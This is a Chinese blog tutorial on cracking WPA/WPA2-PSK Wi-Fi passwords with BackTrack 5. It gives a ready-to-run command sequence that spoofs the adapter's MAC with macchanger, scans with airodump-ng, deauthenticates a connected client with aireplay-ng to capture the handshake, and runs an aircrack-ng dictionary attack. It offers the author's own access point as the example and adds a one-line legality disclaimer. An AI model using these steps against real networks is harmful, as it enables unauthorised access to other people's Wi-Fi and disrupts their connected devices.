用 BackTrack 5 破解 WPA/WPA2-PSK 密码

本文详细介绍使用BT5破解WPA/WPA2-PSK无线网络密码的方法,包括修改网卡MAC地址、抓取握手包及使用字典文件破解等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

说到BackTrack 大家应该第一个就想到破解wifi密码,没错,当年我一开始用BackTrack也是为了要破解密码阿……^^”

前几天有朋友问我说怎么用BT5破解WPA/WPA2-PSK的密码,要破解WPA/WPA2-PSK的密码比起wep难了许多,说真的,除了工具外最需要的还是运气跟密码文件阿…..^^”

不多说,来看看吧!!

首先下载BT5的光盘候用BT5开机,哪边下载跟怎么设定开机就不要提了。
开机后透过 startx 指令进入桌面环境,BT5的桌面还挺漂亮的!!
首先先把装置停掉,改卡号,假设我的网卡界面是 wlan0

点击(此处)折叠或打开

  1. airmon-ng stop wlan0
  2. macchanger --mac 00:11:22:33:44:55 wlan0
  3. airmon-ng start wlan0
接着扫描我们要抓的AP

点击(此处)折叠或打开

  1. airodump-ng wlan0


其中可以看到有非常多个AP,这边我们以我自己的AP为例子, 再次声明,破解他人AP的密码是违法的行为。
其中我们要记得 BSSID: 84:C9:XX:XX:XX:XX 跟 CH:6
airodump-ng  -c (填入刚刚的CH) -w (随便给一个名字) –bssid (要破解的BSSID) wlan0

点击(此处)折叠或打开

  1. airodump-ng -c 6 -w crack_pw_test –bssid 84:C9:XX:XX:XX:XX wlan0
其中画面会像这样子

我们可以看到有三个装置连到这个AP,随便选一个例如 (90:ZZ:ZZ:ZZ:ZZ:ZZ)
接着输入
aireplay-ng  -0 10  -a (BSSID) -c (client_MAC) wlan0

点击(此处)折叠或打开

  1. aireplay-ng -0 10 -a 84:C9:XX:XX:XX:XX -c 90:ZZ:ZZ:ZZ:ZZ:ZZ wlan0

应该可以看到如图所示的WAP Handshake


此时已经接近成功了,如果没有出现类似这样图示的东西的话请重新执行几次。直到完成Handshake为止。
最后就是跑字典文件了
aircrack-ng -w (字典文件) -b (BSSID) (刚刚给的名字)

点击(此处)折叠或打开

  1. aircrack-ng -w dict.txt -b 84:C9:XX:XX:XX:XX crack_pw_test.cap
至于跑不跑得出结果就看个人的造化(字典文件的大小)了!!!最后奉送一个找来的字典文件!!!
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
阅读(5610) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~
评论热议
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kelsel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值